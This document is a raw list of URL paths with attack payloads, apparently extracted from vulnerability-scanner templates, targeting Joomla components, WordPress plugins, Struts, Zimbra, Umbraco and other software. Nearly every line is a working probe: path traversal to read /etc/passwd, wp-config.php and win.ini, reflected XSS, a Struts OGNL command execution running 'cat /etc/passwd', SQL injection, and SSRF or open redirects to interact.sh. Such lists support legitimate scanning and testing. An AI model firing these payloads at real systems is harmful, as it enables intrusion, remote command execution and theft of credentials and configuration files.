/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/names.nsf/People?OpenView
/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/comm.php?id=../../../../../../../../../../etc/passwd
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/lui/
/hub/
/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/../../etc/passwd
/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/index.php?r=i/../../../../../etc/passwd
/index.php?class=../../../../../../../etc/passwd%00
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/index.action?redirect:http://www.interact.sh/
{{paths}}
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter
/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/webEdition/showTempFile.php?file=../../../../etc/passwd
/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
/process/feries.php?fichier=../../../../../../../etc/passwd
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/openwin.php?redirurl=http://interact.sh
/fw/mindex.do?url=./WEB-INF/web.xml%3f
/spaces/viewdefaultdecorator.action?decoratorName
/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match
/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh
/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
/__raw/services/server/info/server-info?output_mode=json
/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/fcgi-bin/wgsetcgi
/html/repository
/services/user/values.xml?var=STATUS
/html/device-id
/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/wp-content/uploads/wp-security-audit-log/failed-logins/
/tests/generate.php
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/mobile/index.php
/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/osm/REGISTER.cmd
/osm_tiles/REGISTER.cmd
/wp-admin/admin.php?page=download_report&report=users&status=all
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/hoteldruid/visualizza_tabelle.php?nsextt=x
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13
/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php
/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019
/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php
/?mp_idx=%22;alert(%271%27);//
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/
/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh
/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E
/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}
/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}
/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/calendar/calendar_form.php/
/index.php?SQ=0&srch=x
/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x
/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9
/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/
/auth/logout?continue=//interact.sh
/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>
/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=
/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6
/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/wa.exe?REPORT&z=4&
/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html
/config/
/nagios/cgi-bin/status.cgi
/cgi-bin/nagios4/status.cgi
/cgi-bin/nagios3/status.cgi
/libraries/joomla/database/
/storage/
/api_smartapp/storage/
/equipbid/storage/
/server/storage/
/intikal/storage/
/elocker_old/storage/
/config/cam_portal.cgi
/index.html

/sqlite/
/sqlitemanager/
/haproxy-status
/haproxy?stats
/phpmyadmin/index.php?db=information_schema
/phpMyAdmin/index.php?db=information_schema
/tcpconfig.html
/zabbix/zabbix.php?action=dashboard.list
/rootDesc.xml
/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>
/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/
/plugins/vkeyboard/vkeyboard.php?passformname={{url_encode(payload)}}
/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/
/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/wp-content/uploads/wpdm-cache/
/wp-content/plugins/wpmudev-updates/keys/
